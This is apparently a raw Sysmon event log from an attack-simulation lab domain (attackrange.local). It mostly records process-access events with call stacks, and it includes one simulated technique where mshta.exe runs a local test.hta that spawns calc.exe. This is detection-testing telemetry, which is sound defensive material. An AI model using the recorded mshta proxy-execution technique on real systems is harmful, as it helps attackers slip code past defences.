15:16:57.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-3269-6010-E0A2-00000000A301}81164212C:\Windows\system32\mshta.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.787{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA,IMPHASH=3843C3D4A5A7D1045ABE9A4BFCFAAB28{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\System32\mshta.exe"C:\Windows\system32\mshta.exe" c:\temp\test.hta 10341000x8000000000000000791913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-3255-6010-D4A2-00000000A301}40245360C:\Windows\system32\svchost.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.766{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 